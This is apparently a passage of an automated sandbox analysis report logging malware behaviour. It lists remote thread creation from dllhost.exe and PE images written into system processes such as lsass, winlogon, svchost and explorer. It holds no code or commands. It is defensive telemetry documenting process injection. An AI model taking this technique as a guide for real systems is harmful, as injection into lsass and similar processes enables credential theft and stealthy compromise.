Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CC25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EE25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 1925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8825AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 8C25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 15125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C425AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: EB25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 14B25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 11025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: C225AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5625AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 13325AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 6A25AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: A125AC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: F59D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: FC3D2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: AF332EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: B73E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 26A52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: D3E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 595A2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 30AF2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 59C92EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 80B2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5AEE2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 5CF52EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3BCD2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: 3BF02EBC
Source: C:\Windows\System32\dllhost.exeThread created: C:\Windows\System32\Conhost.exe EIP: 6F092EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: ED7F2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CD8E2EBC
Source: C:\Windows\System32\dllhost.exeThread created: unknown EIP: CF9E2EBC
Injects a PE file into a foreign processes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B010000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\winlogon.exe base: 2D016580000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\lsass.exe base: 2D6F14E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14E41FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dwm.exe base: 1D15B040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246ED7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23AF32B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23C9FD60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A1CA6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 246EDE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A1980000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 200A19B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22595FB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22E670F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D1FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1FE4A4B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24C19A40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 275D2660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDC90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 23BBDCC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D8FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 227D9540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2DED2C70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14ACE6E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AEFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 220AF660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6940000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 241B6970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 202A22A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 14D25AA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1BD1A2F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 21A63950000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1834ABA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2D8F03D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 18BAF3C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 256EBEB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2568E1B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 226A7DC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\spoolsv.exe base: 12A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1E2C0F50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2EE0D7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22B68FC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 11CD5BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26E569B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22C4F660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 1DBAE500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ApplicationFrameHost.exe base: 27B1B9F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 27FF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 281CF7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207EA800000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 28843650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 1EBCE890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 25F39DF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1AFDEB70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\SysWOW64\wbem\WmiPrvSE.exe base: 3CF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 207C0460000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\conhost.exe base: 1B409660000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 245A2150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1C5325C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 24708EB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 225DEC30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 22F60740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 15EC91C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2CA8FE60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 500000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\sihost.exe base: 1D63DC20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 730000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A799B20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1F6984F0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 410000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26481BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 166D2D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: C30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\ctfmon.exe base: 128DE440000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 2101D0E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 470000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\explorer.exe base: 86A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: D90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 192D1E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 26DD2000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 13D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 257155B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 600000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dasHost.exe base: 16443E50000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: BB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 2C8A6F80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 920000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 1E968250000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 970000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\svchost.exe base: 1A9452E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1020000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\dllhost.exe base: 29227D20000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 590000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\RuntimeBroker.exe base: 283E5BE0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Program Files (x86)\TbabaiHIFjTeFepUZZMcrRKpvuTSkcVDjeugGrcmEzooztNrBjxigdzrahEnKDs\OfyVZAuwZWiDFtIMq.exe base: 1200000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exeMemory written: C:\Windows\System32\smartscreen.exe base: 14BB07C0000 value starts with: 4D5A
